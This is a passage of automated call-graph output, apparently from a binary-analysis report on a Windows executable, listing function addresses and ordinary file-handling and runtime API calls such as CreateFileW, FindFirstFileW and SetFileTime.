calls 26632->26634 26633 7ff741ec2320 _handle_error 8 API calls 26635 7ff741ea3291 26633->26635 26636 7ff741ea3222 26634->26636 26635->26006 26637 7ff741ea3243 26636->26637 26638 7ff741ea3226 DeleteFileW 26636->26638 26637->26639 26640 7ff741ea32a1 26637->26640 26638->26637 26639->26633 26641 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26640->26641 26642 7ff741ea32a6 26641->26642 26644->26006 26645->26006 26649 7ff741ead25e 26646->26649 26647 7ff741ead292 26647->26004 26648 7ff741e91744 33 API calls 26648->26649 26649->26647 26649->26648 26650->25895 26651->25899 26653->25869 26654->25872 26655->25875 26656->25926 26657->25914 26659->25916 26661->26499 26662->26512 26663->26528 26664->26532 26665->26543 26666->26548 26667->26561 26668->26564 26669->26571 26670->26580 26672 7ff741ea5bb0 GetFullPathNameW 26671->26672 26697 7ff741ea5b99 26671->26697 26674 7ff741ea5bd6 26672->26674 26687 7ff741ea5caf 26672->26687 26676 7ff741e913a4 33 API calls 26674->26676 26675 7ff741ec2320 _handle_error 8 API calls 26678 7ff741ea5c96 26675->26678 26679 7ff741ea5bed GetFullPathNameW 26676->26679 26677 7ff741ea6a0c 49 API calls 26680 7ff741ea5d0d 26677->26680 26678->26605 26683 7ff741ea5c20 26679->26683 26679->26687 26682 7ff741ea5d15 GetFullPathNameW 26680->26682 26689 7ff741ea5e6b 26680->26689 26684 7ff741ea5d39 26682->26684 26682->26689 26685 7ff741ea5c31 26683->26685 26683->26687 26686 7ff741e913a4 33 API calls 26684->26686 26696 7ff741e920b0 33 API calls 26685->26696 26690 7ff741ea5d50 GetFullPathNameW 26686->26690 26687->26677 26691 7ff741ea5ef1 26687->26691 26688 7ff741ea5e9f 26688->26697 26701 7ff741ea5eeb 26688->26701 26689->26688 26698 7ff741e920b0 33 API calls 26689->26698 26692 7ff741ea5d82 26690->26692 26693 7ff741ea5e3b 26690->26693 26695 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26691->26695 26692->26693 26694 7ff741ea5d97 26692->26694 26693->26689 26702 7ff741ea5ee0 26693->26702 26705 7ff741e920b0 33 API calls 26694->26705 26699 7ff741ea5ef7 26695->26699 26700 7ff741ea5c47 26696->26700 26697->26675 26698->26688 26700->26691 26700->26697 26703 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26701->26703 26704 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26702->26704 26703->26691 26706 7ff741ea5ee5 26704->26706 26707 7ff741ea5dad 26705->26707 26709 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26706->26709 26707->26702 26708 7ff741ea5de6 26707->26708 26708->26697 26708->26706 26709->26701 26710->26608 26711->26606 26715 7ff741e9b3f2 __scrt_get_show_window_mode 26712->26715 26713 7ff741ec2320 _handle_error 8 API calls 26714 7ff741e9b4b6 26713->26714 26714->26006 26715->26713 26772 7ff741ea86ec 26716->26772 26718 7ff741e9e3c4 26778 7ff741e9e600 26718->26778 26720 7ff741e9e4d4 26723 7ff741ec21d0 33 API calls 26720->26723 26721 7ff741e9e549 26724 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26721->26724 26722 7ff741e9e454 26722->26720 26722->26721 26725 7ff741e9e4f0 26723->26725 26733 7ff741e9e54e 26724->26733 26784 7ff741eb3148 102 API calls 26725->26784 26727 7ff741e9e51d 26728 7ff741ec2320 _handle_error 8 API calls 26727->26728 26729 7ff741e9e52d 26728->26729 26729->26022 26730 7ff741ea18c2 26732 7ff741ea190d 26730->26732 26734 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26730->26734 26731 7ff741e91fa0 31 API calls 26731->26733 26732->26022 26733->26730 26733->26731 26733->26732 26735 7ff741ea193b 26734->26735 26737 7ff741e9e7ea 26736->26737 26738 7ff741e9e864 26737->26738 26740 7ff741e9e8a1 26737->26740 26785 7ff741ea3ec8 26737->26785 26738->26740 26741 7ff741e9e993 26738->26741 26748 7ff741e9e900 26740->26748 26792 7ff741e9f578 26740->26792 26742 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26741->26742 26745 7ff741e9e998 26742->26745 26743 7ff741e9e955 26744 7ff741ec2320 _handle_error 8 API calls 26743->26744 26747 7ff741e9e97e 26744->26747 26750 7ff741e9e578 26747->26750 26748->26743 26828 7ff741e928a4 82 API calls 2 library calls 26748->26828 27833 7ff741ea15d8 26750->27833 26753 7ff741e9e59e 26755 7ff741e91fa0 31 API calls 26753->26755 26754 7ff741eb1870 108 API calls 26754->26753 26756 7ff741e9e5b7 26755->26756 26757 7ff741e91fa0 31 API calls 26756->26757 26758 7ff741e9e5c3 26757->26758 26759 7ff741e91fa0 31 API calls 26758->26759 26760 7ff741e9e5cf 26759->26760 26761 7ff741ea878c 108 API calls 26760->26761 26762 7ff741e9e5db 26761->26762 26763 7ff741e91fa0 31 API calls 26762->26763 26764 7ff741e9e5e4 26763->26764 26765 7ff741e91fa0 31 API calls 26764->26765 26768 7ff741e9e5ed 26765->26768 26766 7ff741ea18c2 26767 7ff741ea190d 26766->26767 26769 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26766->26769 26767->26026 26768->26766 26768->26767 26770 7ff741e91fa0 31 API calls 26768->26770 26771 7ff741ea193b 26769->26771 26770->26768 26773 7ff741ea870a 26772->26773 26774 7ff741ec21d0 33 API calls 26773->26774 26775 7ff741ea872f 26774->26775 26776 7ff741ec21d0 33 API calls 26775->26776 26777 7ff741ea8759 26776->26777 26777->26718 26779 7ff741e9e627 26778->26779 26780 7ff741e9e62c BuildCatchObjectHelperInternal 26778->26780 26781 7ff741e91fa0 31 API calls 26779->26781 26782 7ff741e9e668 BuildCatchObjectHelperInternal 26780->26782 26783 7ff741e91fa0 31 API calls 26780->26783 26781->26780 26782->26722 26783->26782 26784->26727 26786 7ff741ea72cc 8 API calls 26785->26786 26787 7ff741ea3ee1 26786->26787 26791 7ff741ea3f0f 26787->26791 26829 7ff741ea40bc 26787->26829 26790 7ff741ea3efa FindClose 26790->26791 26791->26737 26793 7ff741e9f598 _snwprintf 26792->26793 26868 7ff741e92950 26793->26868 26796 7ff741e9f5cc 26800 7ff741e9f5fc 26796->26800 26883 7ff741e933e4 26796->26883 26799 7ff741e9f5f8 26799->26800 26915 7ff741e93ad8 26799->26915 27134 7ff741e92c54 26800->27134 26807 7ff741e9f7cb 26925 7ff741e9f8a4 26807->26925 26809 7ff741e98d04 33 API calls 26810 7ff741e9f662 26809->26810 27154 7ff741ea7918 48 API calls 2 library calls 26810->27154 26812 7ff741e9f677 26813 7ff741ea3ec8 55 API calls 26812->26813 26821 7ff741e9f6ad 26813->26821 26815 7ff741e9f842 26815->26800 26946 7ff741e969f8 26815->26946 26957 7ff741e9f930 26815->26957 26820 7ff741e9f89a 26824 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26820->26824 26821->26820 26822 7ff741e9f74d 26821->26822 26823 7ff741ea3ec8 55 API calls 26821->26823 27155 7ff741ea7918 48 API calls 2 library calls 26821->27155 26822->26807 26822->26820 26825 7ff741e9f895 26822->26825 26823->26821 26827 7ff741e9f8a0 26824->26827 26826 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26826 26826->26820 26828->26743 26830 7ff741ea41d2 FindNextFileW 26829->26830 26831 7ff741ea40f9 FindFirstFileW 26829->26831 26833 7ff741ea41e1 GetLastError 26830->26833 26836 7ff741ea41f3 26830->26836 26834 7ff741ea411e 26831->26834 26831->26836 26854 7ff741ea41c0 26833->26854 26835 7ff741ea6a0c 49 API calls 26834->26835 26838 7ff741ea4144 26835->26838 26837 7ff741ea4211 26836->26837 26839 7ff741e920b0 33 API calls 26836->26839 26842 7ff741e9129c 33 API calls 26837->26842 26843 7ff741ea4148 FindFirstFileW 26838->26843 26844 7ff741ea4167 26838->26844 26839->26837 26840 7ff741ec2320 _handle_error 8 API calls 26841 7ff741ea3ef4 26840->26841 26841->26790 26841->26791 26845 7ff741ea423b 26842->26845 26843->26844 26844->26836 26847 7ff741ea41af GetLastError 26844->26847 26849 7ff741ea4314 26844->26849 26855 7ff741ea8090 26845->26855 26847->26854 26850 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26849->26850 26851 7ff741ea431a 26850->26851 26852 7ff741ea430f 26853 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26852->26853 26853->26849 26854->26840 26856 7ff741ea80a5 26855->26856 26859 7ff741ea8188 26856->26859 26858 7ff741ea4249 26858->26852 26858->26854 26860 7ff741ea8326 26859->26860 26863 7ff741ea81ba 26859->26863 26867 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26860->26867 26862 7ff741ea832b 26865 7ff741ea81d4 BuildCatchObjectHelperInternal 26863->26865 26866 7ff741ea58a4 33 API calls 2 library calls 26863->26866 26865->26858 26866->26865 26867->26862 26869 7ff741e9296c 26868->26869 26870 7ff741ea86ec 33 API calls 26869->26870 26871 7ff741e9298d 26870->26871 26872 7ff741ec21d0 33 API calls 26871->26872 26873 7ff741e92ac2 26871->26873 26874 7ff741e92ab0 26872->26874 27163 7ff741ea4d04 26873->27163 26874->26873 27156 7ff741e991c8 26874->27156 26878 7ff741ea2ca8 27195 7ff741ea24c0 26878->27195 26880 7ff741ea2cc5 26880->26796 27214 7ff741ea28d0 26883->27214 26884 7ff741e93674 27233 7ff741e928a4 82 API calls 2 library calls 26884->27233 26886 7ff741e93431 __scrt_get_show_window_mode 26892 7ff741e93601 26886->26892 26893 7ff741e9344e 26886->26893 27219 7ff741ea2bb0 26886->27219 26887 7ff741e969f8 132 API calls 26889 7ff741e93682 26887->26889 26889->26887 26890 7ff741e9370c 26889->26890 26889->26892 26911 7ff741ea2aa0 101 API calls 26889->26911 26890->26892 26895 7ff741e93740 26890->26895 27234 7ff741e928a4 82 API calls 2 library calls 26890->27234 26892->26799 26893->26884 26893->26889 26894 7ff741e935cb 26894->26893 26896 7ff741e935d7 26894->26896 26895->26892 26899 7ff741e9384d 26895->26899 26912 7ff741ea2bb0 101 API calls 26895->26912 26896->26892 26897 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26896->26897 26900 7ff741e93891 26897->26900 26898 7ff741e934eb 26898->26894 27228 7ff741ea2aa0 26898->27228 26899->26892 26901 7ff741e920b0 33 API calls 26899->26901 26900->26799 26901->26892 26902 7ff741e969f8 132 API calls 26904 7ff741e9378e 26902->26904 26904->26902 26905 7ff741e93803 26904->26905 26914 7ff741ea2aa0 101 API calls 26904->26914 26907 7ff741ea2aa0 101 API calls 26905->26907 26907->26899 26910 7ff741ea28d0 104 API calls 26910->26898 26911->26889 26912->26904 26913 7ff741ea28d0 104 API calls 26913->26894 26914->26904 26916 7ff741e93af9 26915->26916 26922 7ff741e93b55 26915->26922 27246 7ff741e93378 26916->27246 26918 7ff741ec2320 _handle_error 8 API calls 26920 7ff741e93b67 26918->26920 26920->26807 26920->26809 26921 7ff741e93b6c 26923 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26921->26923 26922->26918 26924 7ff741e93b71 26923->26924 27469 7ff741ea886c 26925->27469 26927 7ff741e9f8ba 27473 7ff741eaef60 GetSystemTime SystemTimeToFileTime 26927->27473 26930 7ff741eb0994 26931 7ff741ec0340 26930->26931 26932 7ff741ea7df4 47 API calls 26931->26932 26933 7ff741ec0373 26932->26933 26934 7ff741eaaae0 48 API calls 26933->26934 26935 7ff741ec0387 26934->26935 26936 7ff741eada98 48 API calls 26935->26936 26937 7ff741ec0397 26936->26937 26938 7ff741e91fa0 31 API calls 26937->26938 26939 7ff741ec03a2 26938->26939 27482 7ff741ebfc68 26939->27482 26947 7ff741e96a0a 26946->26947 26948 7ff741e96a0e 26946->26948 26947->26815 26956 7ff741ea2bb0 101 API calls 26948->26956 26949 7ff741e96a1b 26950 7ff741e96a2f 26949->26950 26951 7ff741e96a3e 26949->26951 26950->26947 27494 7ff741e95e24 26950->27494 27556 7ff741e95130 130 API calls 2 library calls 26951->27556 26954 7ff741e96a3c 26954->26947 27557 7ff741e9466c 82 API calls 26954->27557 26956->26949 26958 7ff741e9f978 26957->26958 26961 7ff741e9f9b0 26958->26961 27018 7ff741e9fa34 26958->27018 27672 7ff741eb612c 137 API calls 3 library calls 26958->27672 26960 7ff741ea1189 26962 7ff741ea11e1 26960->26962 26963 7ff741ea118e 26960->26963 26961->26960 26967 7ff741e9f9d0 26961->26967 26961->27018 26962->27018 27724 7ff741eb612c 137 API calls 3 library calls 26962->27724 26963->27018 27723 7ff741e9dd08 179 API calls 26963->27723 26964 7ff741ec2320 _handle_error 8 API calls 26965 7ff741ea11c4 26964->26965 26965->26815 26967->27018 27587 7ff741e99bb0 26967->27587 26970 7ff741e9fad6 27600 7ff741ea5ef8 26970->27600 27018->26964 27135 7ff741e92c74 27134->27135 27136 7ff741e92c88 27134->27136 27135->27136 27812 7ff741e92d80 108 API calls _invalid_parameter_noinfo_noreturn 27135->27812 27137 7ff741e91fa0 31 API calls 27136->27137 27140 7ff741e92ca1 27137->27140 27153 7ff741e92d64 27140->27153 27813 7ff741e93090 31 API calls _invalid_parameter_noinfo_noreturn 27140->27813 27141 7ff741e92d08 27814 7ff741e93090 31 API calls _invalid_parameter_noinfo_noreturn 27141->27814 27142 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27144 7ff741e92d7c 27142->27144 27145 7ff741e92d14 27146 7ff741e91fa0 31 API calls 27145->27146 27147 7ff741e92d20 27146->27147 27815 7ff741ea878c 27147->27815 27153->27142 27154->26812 27155->26821 27173 7ff741ea56a4 27156->27173 27158 7ff741e991df 27176 7ff741eab788 27158->27176 27162 7ff741e99383 27162->26873 27164 7ff741ea4d32 __scrt_get_show_window_mode 27163->27164 27191 7ff741ea4bac 27164->27191 27166 7ff741ea4d90 27167 7ff741ec2320 _handle_error 8 API calls 27166->27167 27169 7ff741e92b32 27167->27169 27168 7ff741ea4d54 27168->27166 27170 7ff741ea4dae 27168->27170 27169->26796 27169->26878 27171 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27170->27171 27172 7ff741ea4db3 27171->27172 27182 7ff741ea56e8 27173->27182 27177 7ff741e913a4 33 API calls 27176->27177 27178 7ff741e99365 27177->27178 27179 7ff741e99a28 27178->27179 27180 7ff741ea56e8 2 API calls 27179->27180 27181 7ff741e99a36 27180->27181 27181->27162 27183 7ff741ea56fe __scrt_get_show_window_mode 27182->27183 27186 7ff741eaeba4 27183->27186 27189 7ff741eaeb58 GetCurrentProcess GetProcessAffinityMask 27186->27189 27190 7ff741ea56de 27189->27190 27190->27158 27192 7ff741ea4c2f BuildCatchObjectHelperInternal 27191->27192 27193 7ff741ea4c27 27191->27193 27192->27168 27194 7ff741e91fa0 31 API calls 27193->27194 27194->27192 27196 7ff741ea24fd CreateFileW 27195->27196 27198 7ff741ea25ae GetLastError 27196->27198 27208 7ff741ea266e 27196->27208 27199 7ff741ea6a0c 49 API calls 27198->27199 27200 7ff741ea25dc 27199->27200 27201 7ff741ea25e0 CreateFileW GetLastError 27200->27201 27207 7ff741ea262c 27200->27207 27201->27207 27202 7ff741ea26b1 SetFileTime 27206 7ff741ea26cf 27202->27206 27203 7ff741ea2708 27204 7ff741ec2320 _handle_error 8 API calls 27203->27204 27205 7ff741ea271b 27204->27205 27205->26880 27213 7ff741e9b7e8 99 API calls 2 library calls 27205->27213 27206->27203 27209 7ff741e920b0 33 API calls 27206->27209 27207->27208 27210 7ff741ea2736 27207->27210 27208->27202 27208->27206 27209->27203 27211 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27210->27211 27212 7ff741ea273b 27211->27212 27213->26880 27215 7ff741ea28f6 27214->27215 27216 7ff741ea28fd 27214->27216 27215->26886 27216->27215 27218 7ff741ea2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27216->27218 27235 7ff741e9b8a4 99 API calls Concurrency::cancel_current_task 27216->27235 27218->27216 27220 7ff741ea2bcd 27219->27220 27222 7ff741ea2be9 27219->27222 27221 7ff741e934cc 27220->27221 27236 7ff741e9b9c4 99 API calls Concurrency::cancel_current_task 27220->27236 27221->26910 27222->27221 27224 7ff741ea2c01 SetFilePointer 27222->27224 27224->27221 27225 7ff741ea2c1e GetLastError 27224->27225 27225->27221 27226 7ff741ea2c28 27225->27226 27226->27221 27237 7ff741e9b9c4 99 API calls Concurrency::cancel_current_task 27226->27237 27238 7ff741ea2778 27228->27238 27231 7ff741e935a7 27231->26894 27231->26913 27233->26892 27234->26895 27244 7ff741ea2789 _snwprintf 27238->27244 27239 7ff741ec2320 _handle_error 8 API calls 27242 7ff741ea281d 27239->27242 27240 7ff741ea27b5 27240->27239 27241 7ff741ea2890 SetFilePointer 27241->27240 27243 7ff741ea28b8 GetLastError 27241->27243 27242->27231 27245 7ff741e9b9c4 99 API calls Concurrency::cancel_current_task 27242->27245 27243->27240 27244->27240 27244->27241 27247 7ff741e93396 27246->27247 27248 7ff741e9339a 27246->27248 27247->26921 27247->26922 27252 7ff741e93294 27248->27252 27251 7ff741ea2aa0 101 API calls 27251->27247 27253 7ff741e932bb 27252->27253 27255 7ff741e932f6 27252->27255 27254 7ff741e969f8 132 API calls 27253->27254 27258 7ff741e932db 27254->27258 27260 7ff741e96e74 27255->27260 27258->27251 27264 7ff741e96e95 27260->27264 27261 7ff741e969f8 132 API calls 27261->27264 27262 7ff741e9331d 27262->27258 27265 7ff741e93904 27262->27265 27264->27261 27264->27262 27292 7ff741eae808 27264->27292 27300 7ff741e96a7c 27265->27300 27268 7ff741e9396a 27272 7ff741e93989 27268->27272 27273 7ff741e9399a 27268->27273 27269 7ff741e93a8a 27274 7ff741ec2320 _handle_error 8 API calls 27269->27274 27271 7ff741e9394f 27271->27269 27275 7ff741e93ab3 27271->27275 27282 7ff741e93ab8 27271->27282 27333 7ff741eb0d54 33 API calls 27272->27333 27278 7ff741e939a3 27273->27278 27279 7ff741e939ec 27273->27279 27277 7ff741e93a9e 27274->27277 27280 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27275->27280 27277->27258 27334 7ff741eb0c80 33 API calls 27278->27334 27335 7ff741e926b4 33 API calls BuildCatchObjectHelperInternal 27279->27335 27280->27282 27287 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27282->27287 27283 7ff741e939b0 27288 7ff741e91fa0 31 API calls 27283->27288 27291 7ff741e939c0 BuildCatchObjectHelperInternal 27283->27291 27285 7ff741e91fa0 31 API calls 27285->27271 27286 7ff741e93a13 27336 7ff741eb0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27286->27336 27290 7ff741e93abe 27287->27290 27288->27291 27291->27285 27293 7ff741eae811 27292->27293 27294 7ff741eae82b 27293->27294 27298 7ff741e9b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27293->27298 27296 7ff741eae845 SetThreadExecutionState 27294->27296 27299 7ff741e9b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27294->27299 27298->27294 27299->27296 27301 7ff741e96a96 _snwprintf 27300->27301 27302 7ff741e96ae4 27301->27302 27303 7ff741e96ac4 27301->27303 27305 7ff741e96d4d 27302->27305 27308 7ff741e96b0f 27302->27308 27375 7ff741e928a4 82 API calls 2 library calls 27303->27375 27404 7ff741e928a4 82 API calls 2 library calls 27305->27404 27307 7ff741e96ad0 27309 7ff741ec2320 _handle_error 8 API calls 27307->27309 27308->27307 27337 7ff741eb1f94 27308->27337 27310 7ff741e9394b 27309->27310 27310->27268 27310->27271 27332 7ff741e92794 33 API calls __std_swap_ranges_trivially_swappable 27310->27332 27313 7ff741e96c2a 27346 7ff741ea4760 27313->27346 27314 7ff741e96b80 27316 7ff741e96b85 27314->27316 27377 7ff741e940b0 27314->27377 27315 7ff741e96b6e 27376 7ff741e928a4 82 API calls 2 library calls 27315->27376 27316->27313 27331 7ff741e96b7b 27316->27331 27381 7ff741ea8968 109 API calls 27316->27381 27322 7ff741e96c52 27323 7ff741e96cd1 27322->27323 27324 7ff741e96cc7 27322->27324 27382 7ff741eb1f20 27323->27382 27350 7ff741ea1794 27324->27350 27365 7ff741eb1870 27331->27365 27332->27268 27333->27271 27334->27283 27335->27286 27336->27271 27338 7ff741eb2056 std::bad_alloc::bad_alloc 27337->27338 27341 7ff741eb1fc5 std::bad_alloc::bad_alloc 27337->27341 27405 7ff741ec4078 27338->27405 27339 7ff741e96b59 27339->27314 27339->27315 27339->27316 27341->27339 27342 7ff741ec4078 Concurrency::cancel_current_task 2 API calls 27341->27342 27343 7ff741eb200f std::bad_alloc::bad_alloc 27341->27343 27342->27343 27343->27339 27344 7ff741ec4078 Concurrency::cancel_current_task 2 API calls 27343->27344 27345 7ff741eb20a9 27344->27345 27347 7ff741ea4780 27346->27347 27349 7ff741ea478a 27346->27349 27348 7ff741ec21d0 33 API calls 27347->27348 27348->27349 27349->27322 27351 7ff741ea17be __scrt_get_show_window_mode 27350->27351 27410 7ff741ea8a48 27351->27410 27366 7ff741eb188e 27365->27366 27368 7ff741eb18a1 27366->27368 27430 7ff741eae948 27366->27430 27372 7ff741eb18d8 27368->27372 27426 7ff741ec236c 27368->27426 27370 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27371 7ff741eb1ad0 27370->27371 27374 7ff741eb1a37 27372->27374 27437 7ff741eaa984 31 API calls _invalid_parameter_noinfo_noreturn 27372->27437 27374->27370 27375->27307 27376->27331 27378 7ff741e940d7 __scrt_get_show_window_mode 27377->27378 27379 7ff741e940dd 27377->27379 27378->27316 27379->27378 27438 7ff741e94120 33 API calls 2 library calls 27379->27438 27381->27313 27384 7ff741eb1f29 27382->27384 27383 7ff741eb1f5d 27384->27383 27385 7ff741eb1f55 27384->27385 27386 7ff741eb1f49 27384->27386 27404->27307 27406 7ff741ec40b4 RtlPcToFileHeader 27405->27406 27407 7ff741ec4097 27405->27407 27408 7ff741ec40cc 27406->27408 27409 7ff741ec40db RaiseException 27406->27409 27407->27406 27408->27409 27409->27341 27411 7ff741ea8bcd 27410->27411 27415 7ff741ea8a91 BuildCatchObjectHelperInternal 27410->27415 27415->27411 27427 7ff741ec239f 27426->27427 27428 7ff741ec23c8 27427->27428 27429 7ff741eb1870 108 API calls 27427->27429 27428->27372 27429->27427 27431 7ff741eaecd8 103 API calls 27430->27431 27432 7ff741eae95f ReleaseSemaphore 27431->27432 27433 7ff741eae9a3 DeleteCriticalSection CloseHandle CloseHandle 27432->27433 27434 7ff741eae984 27432->27434 27435 7ff741eaea5c 101 API calls 27434->27435 27436 7ff741eae98e CloseHandle 27435->27436 27436->27433 27436->27434 27437->27374 27470 7ff741ea8882 27469->27470 27471 7ff741ea8892 27469->27471 27476 7ff741ea23f0 27470->27476 27471->26927 27474 7ff741ec2320 _handle_error 8 API calls 27473->27474 27475 7ff741e9f7dc 27474->27475 27475->26815 27475->26930 27477 7ff741ea240f 27476->27477 27480 7ff741ea2aa0 101 API calls 27477->27480 27478 7ff741ea2428 27481 7ff741ea2bb0 101 API calls 27478->27481 27479 7ff741ea2438 27479->27471 27480->27478 27481->27479 27483 7ff741ebfc94 27482->27483 27484 7ff741e9129c 33 API calls 27483->27484 27485 7ff741ebfca4 27484->27485 27495 7ff741e95e67 27494->27495 27558 7ff741ea85f0 27495->27558 27497 7ff741e96134 27568 7ff741e96fcc 82 API calls 27497->27568 27502 7ff741e96973 27581 7ff741e9466c 82 API calls 27502->27581 27505 7ff741e9612e 27505->27497 27505->27502 27509 7ff741ea85f0 104 API calls 27505->27509 27511 7ff741e961a4 27509->27511 27511->27497 27552 7ff741e9613c 27556->26954 27559 7ff741ea8614 27558->27559 27560 7ff741ea869a 27558->27560 27561 7ff741ea867c 27559->27561 27563 7ff741e940b0 33 API calls 27559->27563 27560->27561 27562 7ff741e940b0 33 API calls 27560->27562 27561->27505 27564 7ff741ea86b3 27562->27564 27565 7ff741ea864d 27563->27565 27567 7ff741ea28d0 104 API calls 27564->27567 27582 7ff741e9a174 27565->27582 27567->27561 27568->27552 27583 7ff741e9a185 27582->27583 27593 7ff741e99be7 27587->27593 27588 7ff741e99c1b 27589 7ff741ec2320 _handle_error 8 API calls 27588->27589 27590 7ff741e99c9d 27589->27590 27590->26970 27592 7ff741e99c83 27595 7ff741e91fa0 31 API calls 27592->27595 27593->27588 27593->27592 27596 7ff741e99cae 27593->27596 27725 7ff741ea5294 27593->27725 27743 7ff741eadb60 27593->27743 27595->27588 27597 7ff741e99cbf 27596->27597 27747 7ff741eada48 CompareStringW 27596->27747 27597->27592 27599 7ff741e920b0 33 API calls 27597->27599 27599->27592 27613 7ff741ea5f3a 27600->27613 27604 7ff741e9129c 33 API calls 27609 7ff741ea619b 27612 7ff741ea61ce 27613->27604 27613->27609 27613->27612 27672->26961 27723->27018 27724->27018 27726 7ff741ea52d4 27725->27726 27731 7ff741ea5312 __vcrt_InitializeCriticalSectionEx 27726->27731 27737 7ff741ea5339 __vcrt_InitializeCriticalSectionEx 27726->27737 27748 7ff741eb13f4 CompareStringW 27726->27748 27727 7ff741ec2320 _handle_error 8 API calls 27728 7ff741ea5503 27727->27728 27728->27593 27732 7ff741ea5382 __vcrt_InitializeCriticalSectionEx 27731->27732 27731->27737 27749 7ff741eb13f4 CompareStringW 27731->27749 27733 7ff741ea5439 27732->27733 27734 7ff741e9129c 33 API calls 27732->27734 27732->27737 27736 7ff741ea551b 27733->27736 27738 7ff741ea5489 27733->27738 27735 7ff741ea5426 27734->27735 27739 7ff741ea72cc 8 API calls 27735->27739 27740 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27736->27740 27737->27727 27738->27737 27750 7ff741eb13f4 CompareStringW 27738->27750 27739->27733 27745 7ff741eadb73 27743->27745 27744 7ff741eadb91 27744->27593 27745->27744 27746 7ff741e920b0 33 API calls 27745->27746 27746->27744 27747->27597 27748->27731 27749->27732 27750->27737 27812->27136 27813->27141 27814->27145 27816 7ff741ea87af 27815->27816 27818 7ff741ea87df 27815->27818 27817 7ff741ec236c 108 API calls 27816->27817 27820 7ff741ea87ca 27817->27820 27821 7ff741ec236c 108 API calls 27818->27821 27828 7ff741ea882b 27818->27828 27823 7ff741ec236c 108 API calls 27820->27823 27824 7ff741ea8814 27821->27824 27822 7ff741ea8845 27825 7ff741ea461c 108 API calls 27822->27825 27823->27818 27826 7ff741ec236c 108 API calls 27824->27826 27827 7ff741ea8851 27825->27827 27826->27828 27829 7ff741ea461c 27828->27829 27830 7ff741ea4632 27829->27830 27832 7ff741ea463a 27829->27832 27831 7ff741eae948 108 API calls 27830->27831 27831->27832 27832->27822 27834 7ff741ea163e 27833->27834 27838 7ff741ea1681 27833->27838 27836 7ff741ea31bc 51 API calls 27834->27836 27834->27838 27835 7ff741e9e600 31 API calls 27840 7ff741ea16de 27835->27840 27836->27834 27837 7ff741e91fa0 31 API calls 27837->27838 27838->27837 27841 7ff741ea16a0 27838->27841 27839 7ff741ea175b 27843 7ff741ec2320 _handle_error 8 API calls 27839->27843 27840->27839 27842 7ff741ea178d 27840->27842 27841->27835 27845 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 27842->27845 27844 7ff741e9e58a 27843->27844 27844->26753 27844->26754 27846 7ff741ea1792 27845->27846 27848 7ff741eb84cc 4 API calls 27847->27848 27849 7ff741eb84aa 27848->27849 27850 7ff741eb84b9 27849->27850 27859 7ff741eb8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27849->27859 27850->26033 27850->26034 27852->26042 27853->26045 27855 7ff741eb84e3 27854->27855 27856 7ff741eb84de 27854->27856 27855->26045 27860 7ff741eb8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27856->27860 27858->26048 27859->27850 27860->27855 27861->26075 27863->26098 27864->26116 27865->26124 27867->26129 27931 7ff741ec148a 27932 7ff741ec13c9 27931->27932 27932->27931 27933 7ff741ec1900 _com_raise_error 14 API calls 27932->27933 27933->27932 27983 7ff741ec0df5 14 API calls _com_raise_error 27984 7ff741ec2d6c 28009 7ff741ec27fc 27984->28009 27987 7ff741ec2eb8 28107 7ff741ec3170 7 API calls 2 library calls 27987->28107 27988 7ff741ec2d88 __scrt_acquire_startup_lock 27990 7ff741ec2ec2 27988->27990 27992 7ff741ec2da6 27988->27992 28108 7ff741ec3170 7 API calls 2 library calls 27990->28108 27993 7ff741ec2dcb 27992->27993 27997 7ff741ec2de8 __scrt_release_startup_lock 27992->27997 28017 7ff741eccd90 27992->28017 27994 7ff741ec2ecd abort 27996 7ff741ec2e51 28021 7ff741ec32bc 27996->28021 27997->27996 28104 7ff741ecc050 35 API calls __GSHandlerCheck_EH 27997->28104 27999 7ff741ec2e56 28024 7ff741eccd20 27999->28024 28109 7ff741ec2fb0 28009->28109 28012 7ff741ec282b 28111 7ff741eccc50 28012->28111 28013 7ff741ec2827 28013->27987 28013->27988 28018 7ff741eccdeb 28017->28018 28019 7ff741eccdcc 28017->28019 28018->27997 28019->28018 28128 7ff741e91120 28019->28128 28022 7ff741ec3cf0 __scrt_get_show_window_mode 28021->28022 28023 7ff741ec32d3 GetStartupInfoW 28022->28023 28023->27999 28134 7ff741ed0730 28024->28134 28026 7ff741eccd2f 28027 7ff741ec2e5e 28026->28027 28138 7ff741ed0ac0 35 API calls swprintf 28026->28138 28029 7ff741ec0754 28027->28029 28140 7ff741eadfd0 28029->28140 28032 7ff741ea62dc 35 API calls 28033 7ff741ec079a 28032->28033 28217 7ff741eb946c 28033->28217 28035 7ff741ec07a4 __scrt_get_show_window_mode 28222 7ff741eb9a14 28035->28222 28037 7ff741ec0ddc 28040 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 